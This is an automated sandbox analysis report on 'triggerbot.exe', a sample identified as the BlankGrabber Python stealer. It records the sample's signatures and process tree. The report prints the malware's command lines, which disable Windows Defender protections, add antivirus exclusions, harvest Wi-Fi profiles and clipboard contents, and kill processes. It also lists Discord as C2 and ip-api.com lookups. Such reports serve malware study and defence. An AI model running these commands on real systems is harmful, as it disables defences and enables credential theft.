Malware Analysis Report

2024-10-16 07:12

Sample ID 240530-v7crwsgd74
Target triggerbot.exe
SHA256 562011f4373d048ed2b60deb22b126686aee96ceac8255196d599b5f9f378416
Tags
upx execution spyware stealer blankgrabber
score
10/10

Analysis Overview

score
10/10

SHA256

562011f4373d048ed2b60deb22b126686aee96ceac8255196d599b5f9f378416

Threat Level: Known bad

The file triggerbot.exe was found to be: Known bad.

Malicious Activity Summary

upx execution spyware stealer blankgrabber

Blankgrabber family

A stealer written in Python and packaged with Pyinstaller

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

UPX packed file

Reads user/profile data of web browsers

ACProtect 1.3x - 1.4x DLL software

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Looks up external IP address via web service

Enumerates physical storage devices

Gathers system information

Suspicious use of AdjustPrivilegeToken

Enumerates processes with tasklist

Suspicious use of WriteProcessMemory

Detects videocard installed

Suspicious behavior: EnumeratesProcesses

Kills process with taskkill

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-30 17:37

Signatures

A stealer written in Python and packaged with Pyinstaller

Description Indicator Process Target
N/A N/A N/A N/A

Blankgrabber family

blankgrabber

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-30 17:37

Reported

2024-05-30 17:40

Platform

win7-20240508-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\triggerbot.exe"

Signatures

ACProtect 1.3x - 1.4x DLL software

Description Indicator Process Target
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\triggerbot.exe

"C:\Users\Admin\AppData\Local\Temp\triggerbot.exe"

C:\Users\Admin\AppData\Local\Temp\triggerbot.exe

"C:\Users\Admin\AppData\Local\Temp\triggerbot.exe"

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\_MEI18322\python311.dll

MD5 711da56eb35a88095f2baad0e821aa24
SHA1 2755f0d62c54642e936b63974fecc48a971e02e8
SHA256 d8c4c37f8826d9f906686a6b89ba3e37ee766be2893b0a7a9f49fd74f3e6f7a6
SHA512 556151238325dcd7b6d24864b39414cb0d4c2b18e98ac2446a2939bf0312d5b58128f6601e739c300bf3a38c4ddb84078a7b2e800d4e59875c21e23468e38a01

memory/2664-23-0x00000000749F0000-0x0000000074F00000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-30 17:37

Reported

2024-05-30 17:40

Platform

win10v2004-20240226-en

Max time kernel

142s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\triggerbot.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ACProtect 1.3x - 1.4x DLL software

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI49642\rar.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\systeminfo.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4964 wrote to memory of 4164 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Users\Admin\AppData\Local\Temp\triggerbot.exe
PID 4964 wrote to memory of 4164 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Users\Admin\AppData\Local\Temp\triggerbot.exe
PID 4964 wrote to memory of 4164 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Users\Admin\AppData\Local\Temp\triggerbot.exe
PID 4164 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 696 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 696 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 696 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 1116 wrote to memory of 4092 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1116 wrote to memory of 4092 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1116 wrote to memory of 4092 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1772 wrote to memory of 4700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1772 wrote to memory of 4700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1772 wrote to memory of 4700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 696 wrote to memory of 2696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 696 wrote to memory of 2696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 696 wrote to memory of 2696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4164 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 380 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 380 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 380 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 720 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 720 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 720 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 3916 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 3916 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 3916 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 1296 wrote to memory of 2352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1296 wrote to memory of 2352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1296 wrote to memory of 2352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4164 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 1972 wrote to memory of 2988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1972 wrote to memory of 2988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1972 wrote to memory of 2988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1604 wrote to memory of 4956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tree.com
PID 1604 wrote to memory of 4956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tree.com
PID 1604 wrote to memory of 4956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tree.com
PID 4164 wrote to memory of 700 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 700 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 700 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 2964 wrote to memory of 1352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2964 wrote to memory of 1352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2964 wrote to memory of 1352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 380 wrote to memory of 2760 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\Conhost.exe
PID 380 wrote to memory of 2760 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\Conhost.exe
PID 380 wrote to memory of 2760 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\Conhost.exe
PID 720 wrote to memory of 1400 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\Conhost.exe

Processes

C:\Users\Admin\AppData\Local\Temp\triggerbot.exe

"C:\Users\Admin\AppData\Local\Temp\triggerbot.exe"

C:\Users\Admin\AppData\Local\Temp\triggerbot.exe

"C:\Users\Admin\AppData\Local\Temp\triggerbot.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\triggerbot.exe'"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎ ‏‌ .scr'"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\triggerbot.exe'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎ ‏‌ .scr'

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\SysWOW64\tasklist.exe

tasklist /FO LIST

C:\Windows\SysWOW64\tasklist.exe

tasklist /FO LIST

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\SysWOW64\tree.com

tree /A /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand <encoded command not reproduced in this report>"

C:\Windows\SysWOW64\tasklist.exe

tasklist /FO LIST

C:\Windows\SysWOW64\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\SysWOW64\netsh.exe

netsh wlan show profile

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\SysWOW64\systeminfo.exe

systeminfo

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand <encoded command not reproduced in this report>

C:\Windows\SysWOW64\tree.com

tree /A /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\SysWOW64\tree.com

tree /A /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\SysWOW64\tree.com

tree /A /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\SysWOW64\tree.com

tree /A /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\SysWOW64\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uv0yazf4\uv0yazf4.cmdline"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\SysWOW64\getmac.exe

getmac

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3476"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /PID 3476

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4E4A.tmp" "c:\Users\Admin\AppData\Local\Temp\uv0yazf4\CSCEA4EBACB51ED4AC78CEBE87F415E4A33.TMP"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4916"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /PID 4916

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4452"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /PID 4452

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4260"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /PID 4260

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2012"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /PID 2012

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5016"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /PID 5016

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4492"

C:\Windows\System32\sihclient.exe

